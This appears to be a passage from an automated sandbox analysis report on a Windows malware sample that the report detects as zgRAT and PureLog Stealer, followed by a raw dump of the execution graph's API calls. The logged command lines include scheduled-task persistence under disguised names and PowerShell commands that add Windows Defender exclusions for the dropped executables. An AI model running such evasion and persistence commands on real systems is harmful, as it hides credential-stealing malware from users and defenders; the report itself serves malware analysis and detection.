                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
                                                                Imagebase:0x7ff75f120000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff75f120000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:33
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Imagebase:0x70000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 63%, ReversingLabs
                                                                Has exited:true

                                                                Target ID:35
                                                                Start time:10:25:39
                                                                Start date:11/01/2025
                                                                Path:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
                                                                Imagebase:0x1e0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:38
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:39
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:40
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:41
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:42
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:43
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:44
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:45
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
                                                                Imagebase:0x7ff6068e0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:46
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:47
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:48
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:49
                                                                Start time:10:25:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Target ID:50
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat"
                                                                Imagebase:0x7ff6c1f90000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:51
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:52
                                                                Start time:10:25:41
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\chcp.com
                                                                Wow64 process (32bit):false
                                                                Commandline:chcp 65001
                                                                Imagebase:0x7ff685350000
                                                                File size:14'848 bytes
                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:54
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Imagebase:0x7a0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:55
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Imagebase:0x820000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:56
                                                                Start time:10:25:42
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\PING.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:ping -n 10 localhost
                                                                Imagebase:0x7ff75fa20000
                                                                File size:22'528 bytes
                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:69
                                                                Start time:10:26:19
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\Conhost.exe
                                                                Wow64 process (32bit):
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:
                                                                Has administrator privileges:
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false


                                                                  Execution Graph

                                                                  Execution Coverage:9.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:9.4%
                                                                  Total number of Nodes:1489
                                                                  Total number of Limit Nodes:40
                                                                  execution_graph: [node and edge dump of the interactive execution-graph view omitted; it is not reproducible as text, and only the coverage figures listed above are recoverable]
24320->24326 24321 45898b 24603 452021 74 API calls 24321->24603 24322 458992 24323 458a5f 24322->24323 24330 4589e1 24322->24330 24327 458ab6 24323->24327 24342 458a6a 24323->24342 24326->24312 24326->24320 24326->24321 24326->24322 24601 458117 84 API calls 24326->24601 24602 452021 74 API calls 24326->24602 24334 458a4c 24327->24334 24606 457fc0 97 API calls 24327->24606 24328 458b14 24331 459105 24328->24331 24349 458b82 24328->24349 24607 4598bc 24328->24607 24329 458ab4 24335 45959a 80 API calls 24329->24335 24330->24328 24330->24334 24336 45a231 3 API calls 24330->24336 24333 45959a 80 API calls 24331->24333 24333->24312 24334->24328 24334->24329 24335->24312 24337 458a19 24336->24337 24337->24334 24604 4592a3 97 API calls 24337->24604 24339 45ab1a 8 API calls 24340 458bd1 24339->24340 24343 45ab1a 8 API calls 24340->24343 24342->24329 24605 457db2 101 API calls 24342->24605 24363 458be7 24343->24363 24347 458b70 24611 456e98 77 API calls 24347->24611 24349->24339 24350 458e40 24355 458e66 24350->24355 24356 458e52 24350->24356 24375 458d49 24350->24375 24351 458d18 24353 458d8a 24351->24353 24354 458d28 24351->24354 24352 458cbc 24352->24350 24352->24351 24360 458167 19 API calls 24353->24360 24357 458d6e 24354->24357 24364 458d37 24354->24364 24359 463377 75 API calls 24355->24359 24358 459215 123 API calls 24356->24358 24357->24375 24614 4577b8 111 API calls 24357->24614 24358->24375 24361 458e7f 24359->24361 24365 458dbd 24360->24365 24617 463020 123 API calls 24361->24617 24362 458c93 24362->24352 24612 459a3c 82 API calls 24362->24612 24363->24352 24363->24362 24369 45981a 79 API calls 24363->24369 24613 452021 74 API calls 24364->24613 24371 458df5 24365->24371 24372 458de6 24365->24372 24365->24375 24369->24362 24616 459155 93 API calls __EH_prolog 24371->24616 24615 457542 85 API calls 24372->24615 24378 458f85 24375->24378 24618 452021 74 API calls 24375->24618 24377 459090 24377->24331 24379 45a4ed 3 API calls 24377->24379 24378->24331 
24378->24377 24380 45903e 24378->24380 24592 459f09 SetEndOfFile 24378->24592 24381 4590eb 24379->24381 24593 459da2 24380->24593 24381->24331 24619 452021 74 API calls 24381->24619 24384 459085 24386 459620 77 API calls 24384->24386 24386->24377 24387 4590fb 24620 456dcb 76 API calls _wcschr 24387->24620 24390 4516a4 24389->24390 24636 45cee1 24390->24636 24394 459f59 24393->24394 24395 459f63 24394->24395 24644 456d0c 78 API calls 24394->24644 24395->24228 24397->24241 24398->24238 24413 451732 24399->24413 24401 4513d6 24402 459e80 24401->24402 24403 459ea5 24402->24403 24404 459e92 24402->24404 24406 459eb8 SetFilePointer 24403->24406 24408 459eb0 24403->24408 24404->24408 24430 456d5b 77 API calls 24404->24430 24407 459ed4 GetLastError 24406->24407 24406->24408 24407->24408 24409 459ede 24407->24409 24408->24274 24409->24408 24431 456d5b 77 API calls 24409->24431 24411->24277 24412->24273 24414 451748 24413->24414 24425 4517a0 __InternalCxxFrameHandler 24413->24425 24415 451771 24414->24415 24426 456c36 76 API calls __vswprintf_c_l 24414->24426 24417 4517c7 24415->24417 24422 45178d ___std_exception_copy 24415->24422 24419 473e3e 22 API calls 24417->24419 24418 451767 24427 456ca7 75 API calls 24418->24427 24421 4517ce 24419->24421 24421->24425 24429 456ca7 75 API calls 24421->24429 24422->24425 24428 456ca7 75 API calls 24422->24428 24425->24401 24426->24418 24427->24415 24428->24425 24429->24425 24430->24403 24431->24408 24433 45cf4d 24432->24433 24435 45cf54 24432->24435 24437 45981a 24433->24437 24435->24282 24436->24284 24438 459833 24437->24438 24440 459e80 79 API calls 24438->24440 24439 459865 24439->24435 24440->24439 24442 4519bf 24441->24442 24444 4519bb 24441->24444 24445 4518f6 24442->24445 24444->24288 24446 451908 24445->24446 24447 451945 24445->24447 24448 453b2d 101 API calls 24446->24448 24453 453fa3 24447->24453 24450 451928 24448->24450 24450->24444 24456 453fac 24453->24456 24454 453b2d 101 API calls 24454->24456 24456->24454 24457 451966 
24456->24457 24470 460e08 24456->24470 24457->24450 24458 451e50 24457->24458 24459 451e5a __EH_prolog 24458->24459 24478 453bba 24459->24478 24461 451e84 24462 451732 78 API calls 24461->24462 24465 451f0b 24461->24465 24463 451e9b 24462->24463 24506 4518a9 78 API calls 24463->24506 24465->24450 24466 451eb3 24467 451ebf _wcslen 24466->24467 24507 461b84 MultiByteToWideChar 24466->24507 24508 4518a9 78 API calls 24467->24508 24471 460e0f 24470->24471 24472 460e2a 24471->24472 24476 456c31 RaiseException _com_raise_error 24471->24476 24474 460e3b SetThreadExecutionState 24472->24474 24477 456c31 RaiseException _com_raise_error 24472->24477 24474->24456 24476->24472 24477->24474 24479 453bc4 __EH_prolog 24478->24479 24480 453bf6 24479->24480 24481 453bda 24479->24481 24483 453e51 24480->24483 24486 453c22 24480->24486 24534 45138b 74 API calls 24481->24534 24551 45138b 74 API calls 24483->24551 24485 453be5 24485->24461 24486->24485 24509 463377 24486->24509 24488 453ca3 24489 453d2e 24488->24489 24505 453c9a 24488->24505 24537 45d051 24488->24537 24519 45ab1a 24489->24519 24490 453c9f 24490->24488 24536 4520bd 78 API calls 24490->24536 24492 453c71 24492->24488 24492->24490 24493 453c8f 24492->24493 24535 45138b 74 API calls 24493->24535 24497 453d41 24499 453dd7 24497->24499 24500 453dc7 24497->24500 24543 463020 123 API calls 24499->24543 24523 459215 24500->24523 24503 453dd5 24503->24505 24544 452021 74 API calls 24503->24544 24545 462297 24505->24545 24506->24466 24507->24467 24508->24465 24510 46338c 24509->24510 24512 463396 ___std_exception_copy 24509->24512 24552 456ca7 75 API calls 24510->24552 24513 4634c6 24512->24513 24514 46341c 24512->24514 24518 463440 __cftof 24512->24518 24554 47238d RaiseException 24513->24554 24553 4632aa 75 API calls 3 library calls 24514->24553 24517 4634f2 24518->24492 24520 45ab28 24519->24520 24522 45ab32 24519->24522 24521 46eb38 8 API calls 24520->24521 24521->24522 24522->24497 24524 45921f __EH_prolog 24523->24524 24555 
457c64 24524->24555 24527 4513ba 78 API calls 24528 459231 24527->24528 24558 45d114 24528->24558 24530 45928a 24530->24503 24531 459243 24531->24530 24533 45d114 118 API calls 24531->24533 24567 45d300 97 API calls __InternalCxxFrameHandler 24531->24567 24533->24531 24534->24485 24535->24505 24536->24488 24538 45d084 24537->24538 24539 45d072 24537->24539 24569 45603a 82 API calls 24538->24569 24568 45603a 82 API calls 24539->24568 24542 45d07c 24542->24489 24543->24503 24544->24505 24546 4622a1 24545->24546 24547 4622ba 24546->24547 24550 4622ce 24546->24550 24570 460eed 86 API calls 24547->24570 24549 4622c1 24549->24550 24551->24485 24552->24512 24553->24518 24554->24517 24556 45b146 GetVersionExW 24555->24556 24557 457c69 24556->24557 24557->24527 24564 45d12a __InternalCxxFrameHandler 24558->24564 24559 45d29a 24560 45d2ce 24559->24560 24561 45d0cb 6 API calls 24559->24561 24562 460e08 SetThreadExecutionState RaiseException 24560->24562 24561->24560 24565 45d291 24562->24565 24563 468c8d 103 API calls 24563->24564 24564->24559 24564->24563 24564->24565 24566 45ac05 91 API calls 24564->24566 24565->24531 24566->24564 24567->24531 24568->24542 24569->24542 24570->24549 24571->24298 24572->24298 24573->24297 24575 455d2a 24574->24575 24621 455c4b 24575->24621 24577 455d5d 24579 455d95 24577->24579 24626 45b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24577->24626 24579->24313 24581 458186 24580->24581 24582 458232 24581->24582 24633 45be5e 19 API calls __InternalCxxFrameHandler 24581->24633 24632 461fac CharUpperW 24582->24632 24585 45823b 24585->24316 24587 457c22 24586->24587 24588 457c5a 24587->24588 24634 456e7a 74 API calls 24587->24634 24588->24326 24590 457c52 24635 45138b 74 API calls 24590->24635 24592->24380 24594 459db3 24593->24594 24597 459dc2 24593->24597 24595 459db9 FlushFileBuffers 24594->24595 24594->24597 24595->24597 24596 459e3f SetFileTime 24596->24384 24597->24596 24598->24307 24599->24312 24600->24312 
24601->24326 24602->24326 24603->24322 24604->24334 24605->24329 24606->24334 24608 4598c5 GetFileType 24607->24608 24609 458b5a 24607->24609 24608->24609 24609->24349 24610 452021 74 API calls 24609->24610 24610->24347 24611->24349 24612->24352 24613->24375 24614->24375 24615->24375 24616->24375 24617->24375 24618->24378 24619->24387 24620->24331 24627 455b48 24621->24627 24623 455c6c 24623->24577 24625 455b48 2 API calls 24625->24623 24626->24577 24630 455b52 24627->24630 24628 455c3a 24628->24623 24628->24625 24630->24628 24631 45b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24630->24631 24631->24630 24632->24585 24633->24582 24634->24590 24635->24588 24637 45cef2 24636->24637 24642 45a99e 86 API calls 24637->24642 24639 45cf24 24643 45a99e 86 API calls 24639->24643 24641 45cf2f 24642->24639 24643->24641 24644->24395 24646 45a6a8 24645->24646 24647 45a727 FindNextFileW 24646->24647 24648 45a6c1 FindFirstFileW 24646->24648 24650 45a732 GetLastError 24647->24650 24655 45a709 24647->24655 24649 45a6d0 24648->24649 24648->24655 24651 45bb03 GetCurrentDirectoryW 24649->24651 24650->24655 24652 45a6e0 24651->24652 24653 45a6e4 FindFirstFileW 24652->24653 24654 45a6fe GetLastError 24652->24654 24653->24654 24653->24655 24654->24655 24655->24250 24665 46a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24656->24665 24658 46a5cd 24659 46a5d9 24658->24659 24666 46a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24658->24666 24659->24050 24659->24051 24661->24054 24662->24060 24663->24060 24664->24063 24665->24658 24666->24659 24667->24069 24669 459f42 78 API calls 24668->24669 24670 451fe8 24669->24670 24671 451a04 101 API calls 24670->24671 24674 452005 24670->24674 24672 451ff5 24671->24672 24672->24674 24675 45138b 74 API calls 24672->24675 24674->24077 24674->24078 24675->24674 25416 4694e0 GetClientRect 25417 46f2e0 46 API calls __RTC_Initialize 25461 4621e0 26 API calls std::bad_exception::bad_exception 25418 47bee0 GetCommandLineA 
GetCommandLineW 25463 45f1e8 FreeLibrary 25420 455ef0 82 API calls 25464 4595f0 80 API calls 24691 4798f0 24699 47adaf 24691->24699 24694 479904 24696 47990c 24697 479919 24696->24697 24707 479920 11 API calls 24696->24707 24708 47ac98 24699->24708 24702 47adee TlsAlloc 24703 47addf 24702->24703 24704 46fbbc CatchGuardHandler 5 API calls 24703->24704 24705 4798fa 24704->24705 24705->24694 24706 479869 20 API calls 2 library calls 24705->24706 24706->24696 24707->24694 24709 47acc4 24708->24709 24710 47acc8 24708->24710 24709->24710 24711 47ace8 24709->24711 24715 47ad34 24709->24715 24710->24702 24710->24703 24711->24710 24713 47acf4 GetProcAddress 24711->24713 24714 47ad04 _unexpected 24713->24714 24714->24710 24716 47ad55 LoadLibraryExW 24715->24716 24721 47ad4a 24715->24721 24717 47ad72 GetLastError 24716->24717 24720 47ad8a 24716->24720 24719 47ad7d LoadLibraryExW 24717->24719 24717->24720 24718 47ada1 FreeLibrary 24718->24721 24719->24720 24720->24718 24720->24721 24721->24709 24722 47abf0 24725 47abfb 24722->24725 24724 47ac24 24735 47ac50 DeleteCriticalSection 24724->24735 24725->24724 24726 47ac20 24725->24726 24728 47af0a 24725->24728 24729 47ac98 _unexpected 5 API calls 24728->24729 24730 47af31 24729->24730 24731 47af4f InitializeCriticalSectionAndSpinCount 24730->24731 24732 47af3a 24730->24732 24731->24732 24733 46fbbc CatchGuardHandler 5 API calls 24732->24733 24734 47af66 24733->24734 24734->24725 24735->24726 25421 4788f0 7 API calls ___scrt_uninitialize_crt 25466 46fd4f 9 API calls 2 library calls 25422 472cfb 38 API calls 4 library calls 25423 46c793 102 API calls 5 library calls 25468 469580 6 API calls 25470 46b18d 78 API calls 25425 46c793 97 API calls 4 library calls 25472 46eda7 48 API calls _unexpected 25473 46f3a0 27 API calls 25429 47a4a0 71 API calls _free 25430 46dca1 DialogBoxParamW 25431 4808a0 IsProcessorFeaturePresent 25475 456faa 111 API calls 3 library calls 24773 46f3b2 24774 46f3be ___scrt_is_nonwritable_in_current_image 
24773->24774 24805 46eed7 24774->24805 24776 46f3c5 24777 46f518 24776->24777 24780 46f3ef 24776->24780 24878 46f838 4 API calls 2 library calls 24777->24878 24779 46f51f 24871 477f58 24779->24871 24790 46f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24780->24790 24816 478aed 24780->24816 24787 46f40e 24789 46f48f 24824 46f953 GetStartupInfoW __cftof 24789->24824 24790->24789 24874 477af4 38 API calls 2 library calls 24790->24874 24792 46f495 24825 478a3e 51 API calls 24792->24825 24794 46f49d 24826 46df1e 24794->24826 24799 46f4b1 24799->24779 24800 46f4b5 24799->24800 24801 46f4be 24800->24801 24876 477efb 28 API calls _abort 24800->24876 24877 46f048 12 API calls ___scrt_uninitialize_crt 24801->24877 24804 46f4c6 24804->24787 24806 46eee0 24805->24806 24880 46f654 IsProcessorFeaturePresent 24806->24880 24808 46eeec 24881 472a5e 24808->24881 24810 46eef1 24811 46eef5 24810->24811 24889 478977 24810->24889 24811->24776 24814 46ef0c 24814->24776 24817 478b04 24816->24817 24818 46fbbc CatchGuardHandler 5 API calls 24817->24818 24819 46f408 24818->24819 24819->24787 24820 478a91 24819->24820 24822 478ac0 24820->24822 24821 46fbbc CatchGuardHandler 5 API calls 24823 478ae9 24821->24823 24822->24821 24823->24790 24824->24792 24825->24794 24982 460863 24826->24982 24830 46df3d 25031 46ac16 24830->25031 24832 46df46 __cftof 24833 46df59 GetCommandLineW 24832->24833 24834 46dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24833->24834 24835 46df68 24833->24835 24836 454092 _swprintf 51 API calls 24834->24836 25065 46c5c4 83 API calls 24835->25065 24838 46e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24836->24838 25035 46b6dd LoadBitmapW 24838->25035 24839 46df6e 24841 46df76 OpenFileMappingW 24839->24841 24842 46dfe0 24839->24842 24845 46dfd6 CloseHandle 24841->24845 24846 46df8f MapViewOfFile 24841->24846 25067 46dbde SetEnvironmentVariableW SetEnvironmentVariableW 24842->25067 24845->24834 24848 46dfa0 
__InternalCxxFrameHandler 24846->24848 24849 46dfcd UnmapViewOfFile 24846->24849 25066 46dbde SetEnvironmentVariableW SetEnvironmentVariableW 24848->25066 24849->24845 24854 46dfbc 24854->24849 24855 4690b7 8 API calls 24856 46e0aa DialogBoxParamW 24855->24856 24857 46e0e4 24856->24857 24858 46e0f6 Sleep 24857->24858 24859 46e0fd 24857->24859 24858->24859 24860 46e10b 24859->24860 25068 46ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24859->25068 24862 46e12a DeleteObject 24860->24862 24863 46e146 24862->24863 24864 46e13f DeleteObject 24862->24864 24865 46e177 24863->24865 24866 46e189 24863->24866 24864->24863 25069 46dc3b 6 API calls 24865->25069 25062 46ac7c 24866->25062 24869 46e17d CloseHandle 24869->24866 24870 46e1c3 24875 46f993 GetModuleHandleW 24870->24875 25200 477cd5 24871->25200 24874->24789 24875->24799 24876->24801 24877->24804 24878->24779 24880->24808 24893 473b07 24881->24893 24885 472a6f 24886 472a7a 24885->24886 24907 473b43 DeleteCriticalSection 24885->24907 24886->24810 24888 472a67 24888->24810 24936 47c05a 24889->24936 24892 472a7d 7 API calls 2 library calls 24892->24811 24894 473b10 24893->24894 24896 473b39 24894->24896 24897 472a63 24894->24897 24908 473d46 24894->24908 24913 473b43 DeleteCriticalSection 24896->24913 24897->24888 24899 472b8c 24897->24899 24929 473c57 24899->24929 24902 472ba1 24902->24885 24904 472baf 24905 472bbc 24904->24905 24935 472bbf 6 API calls ___vcrt_FlsFree 24904->24935 24905->24885 24907->24888 24914 473c0d 24908->24914 24911 473d7e InitializeCriticalSectionAndSpinCount 24912 473d69 24911->24912 24912->24894 24913->24897 24915 473c26 24914->24915 24916 473c4f 24914->24916 24915->24916 24921 473b72 24915->24921 24916->24911 24916->24912 24919 473c3b GetProcAddress 24919->24916 24920 473c49 24919->24920 24920->24916 24927 473b7e ___vcrt_InitializeCriticalSectionEx 24921->24927 24922 473bf3 24922->24916 24922->24919 24923 473b95 LoadLibraryExW 24924 473bb3 GetLastError 24923->24924 24925 473bfa 
